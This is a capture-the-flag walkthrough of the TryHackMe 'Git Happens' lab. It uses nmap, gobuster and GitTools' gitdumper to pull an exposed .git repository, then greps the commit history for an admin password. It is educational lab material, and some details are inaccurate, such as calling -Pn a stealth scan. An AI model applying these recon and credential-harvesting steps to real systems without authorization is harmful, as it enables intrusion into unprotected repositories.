In this CTF (Capture the Flag) walkthrough, we will be working through the TryHackMe challenge, Git Happens!
If you don’t want any spoilers, I’d recommend trying out this free hacking challenge first before reading any further. You can also watch the video where I’ll walk you through the whole challenge:
We’ll be hacking into a git repository and extracting the
username:password combination for the administrative portal.
We’ll make use of
gittools to extract the early git commits and comments. The final step is to use some clever command line text parsing to quickly narrow things down to our password and username.
First let’s export our IPs:
export myIP=10.6.2.23 export targetIP=10.10.122.132
Now we’ll go ahead and connect to the TryHackMe VPN from our Kali VM (Virtual Machine). In the walkthrough video, I am running Manjaro Linux with a virtual Kali machine running on Gnome Boxes.
sudo openvpn kalisurfer.ovpn
Now that we are properly connected to our target machine let’s start the first phase of our hack.
Our standard Nmap scan has a few extra flags today to extend the functionality.
sudo nmap $targetIP -Pn -p- -sC -A -O -oN nmap-scan-results.txt
-Pn= stealth scan, skip host discovery
-p-= scan all ports
- -sC = run standard scripts
-A= Enable OS detection, version detection, script scanning, and traceroute
-O= Detect operating system
-oN= output in normal format [filename]
GNU nano 7.0 nmap-scan.txt # Nmap 7.93 scan initiated Tue Dec 13 10:51:00 2022 as: nmap -Pn -sC -p- -O -oN nmap-scan.txt 10.112.132 Nmap scan report for 10.112.132 (10.112.0.132) Host is up (0.0012s latency). All 65535 scanned ports on 10.112.132 (10.112.0.132) are in ignor ed states. Not shown: 64535 filtered tcp ports (net-unreach), 1000 filtered tcp ports (no-response) Too many fingerprints match this host to give specific OS details OS detection performed. Please report any incorrect results at ht tps://nmap.org/submit/ . # Nmap done at Tue Dec 13 10:54:32 2022 -- 1 IP address (1 host u p) scanned in 212.47 seconds
WALKING THE WEBSITE
We discover a login page by loading up our browser to our
$targetIP. We try a few guesses of standard administrator
user:password combinations without any luck.
DIRECTORY SNIFFING WITH GOBUSTER
Next, we will sniff out directories with GoBuster. With the following command, we discover a hidden page at
gobuster dir -w ~/hacking-tools/SecLists/Discovery/Web-Content/dirsearch.txt --url http://10.10.122.132
The hidden page looks like an index of the Git repo. We can download the files individually, but with
Gittools we can extract even more metadata from the Git repo.
USING GITTOOLS TO EXTRACT REPO METADATA
First, we’ll download Gittools from the official Github repo.
After navigating into the new directory from Gitttools, we run the
gitdumper.sh file with our target address and download location.
Use the dumper:
./gitdumper.sh http://10.10.122.132/.git/ ~/THM/Git-Happens
Now we can view more details about the Git commits with the command ‘
COMMAND LINE TEXT PARSING
This next series of commands will help us to quickly narrow things down to our
git log | grep commit
This command displays the list of commits and hashes
git log | grep commit | cut -d " " -f2
Now we cut out just the list of hashes. The cut
-d " " -f2 part of the command cuts the list into a dictionary with an open space as the delimiter.
-f2 displays only field 2. If this was an Excel spreadsheet, it is as if we are only viewing column 2.
Next, we’ll send that output as a new input to the command
<hash> git show with
-git log | grep commit | cut -d " " -f2 | xargs git show
Let’s extend the command a bit further to save it to a
git log | grep commit | cut -d " " -f2 | xargs git show > gitcommits.txt
We can look through this
.txt file manually, but it is faster to use “
grep password” to find text lines with the word “
cat gitcommits.txt | grep password
And to find the username:
Now we can find the password in plaintext with a simple glance over the output.
Thanks for watching! Catch you next time.
Feel free to check out our other TryHackMe walkthrough:
👉 Recommended: Web Hacking 101: Solving the TryHackMe Pickle Rick “Capture The Flag” Challenge
The two tracks used as background music are used under creative commons licenses and were downloaded at https://freemusicarchive.org
- Mr. Frisby’s Beat Pocket – Cool Fountains
- Damiano Baldoni – Gothic trip with thunderhorse
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.